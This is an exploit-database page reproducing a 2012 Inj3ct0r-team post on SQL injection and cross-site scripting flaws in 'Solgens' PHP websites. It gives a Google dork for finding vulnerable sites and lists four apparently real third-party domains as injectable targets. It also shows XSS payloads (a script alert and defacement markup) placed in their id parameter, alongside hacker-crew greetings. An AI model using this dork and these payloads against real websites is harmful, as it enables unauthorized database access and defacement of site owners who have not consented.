Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtThe_cyber_nuxbie1337DAY-ID-17533
HistoryFeb 17, 2012 - 12:00 a.m.

Solgens XSS / SQL Injection Vulnerability

2012-02-1700:00:00
the_cyber_nuxbie
0day.today
31
JSON

Exploit for php platform in category web applications

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Official Website: http://www.1337day.com                        0
1  [+] Support E-mail  : mr.inj3ct0r[at]gmail.com                      1
0                                                                      0
1                ##########################################            1
0                I'm NuxbieCyber Member From Inj3ct0r Team             1
1                ##########################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[ Solgens SQLInjection Vulnerability ]

[x] Author : the_cyber_nuxbie
[x] Home   : www.thecybernuxbie.com
[x] E-mail : [email protected]
[x] Found  : 18 February 2012 @ 00:53 AM.
[x] Tested : Back|Track 5.
[x] Dork   : inurl:"/matter.php?id="
________________________________________________________________
****************************************************************

- Exploit Report:
http://localhost/matter.php?id=[SQLinjection]

- Website Vuln SQLi:
http://govtitikapurthala.com/matter.php?id=24' + [SQL Injection]
http://krishairtravels.com/matter.php?id=5' + [SQL Injection]
http://solgens.us/india/itikapurthala.com/matter.php?id=28' + [SQL Injection]
http://dentistryriar.com/matter.php?id=1' + [SQL Injection]

 - Google Dork:
 inurl:"/matter.php?id=" Designed & Developed by SolGens™

 - Exploit Concept:
 http://lokalisasi/matter.php?id=[XSS]

 - Sample Web Persistent XSS Vulnerability:
 http://solgens.us/india/itikapurthala.com/matter.php?id=<marquee><h1>XSSed By Nuxbie</h1><marquee> <:- [XSS]
 http://krishairtravels.com/matter.php?id=<marquee><font color=red size=15>XSSed By Nuxbie</font></marquee> <:- [XSS]
 http://govtitikapurthala.com/matter.php?id=<script>alert(31337);</script> <:- [XSS]



0day no more...
"n0 d0rk f0r k1dd10ts"

- Greetz:
*** 1337day Inject0r TEAM ***
...:::' All Member & Staff Inject0r TEAM ':::...

- Greetz To All Exploiters From Indonesian:
[ Member Of Inj3ct0r & Exploit-DB ]
Akatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto, EA Ngel,
eidelweiss, Flyff666, g3mbeLz_YCL, Gendenk, gunslinger_, h4ntu, IbnuSina, irvian, Jack, k3m4n9i, k1ngk0n9, k1tk4t,
k4mtiez, K-159, kecemplungkalen, Mask_magicianz, MISTERFRIBO, M3NW5, Mbah_Semar, mywisdom, Newbie Campuz, Netrondoank,
NoGe, NTOS-Team, Oli Bekas, OoN_Boy, Pokeng, r3m1ck, S3T4N, s4va, sikunYuk, SENOT, skulmatic, spykit, Sudden_death,
team_elite, tempe_mendoan, the_day, tomplixsee, v3n0m, vir0e5, Vrs-hCk, vYc0d, Xr0b0t, y3d1ps, etc... 

"Kalian Telah Mengharumkan Nama INDONESIA Di Dunia IT-Underground"

Me @ February, 18 2012, GMT +00:53 Solo Raya, Indonesian.



#  0day.today [2018-03-13]  #
JSON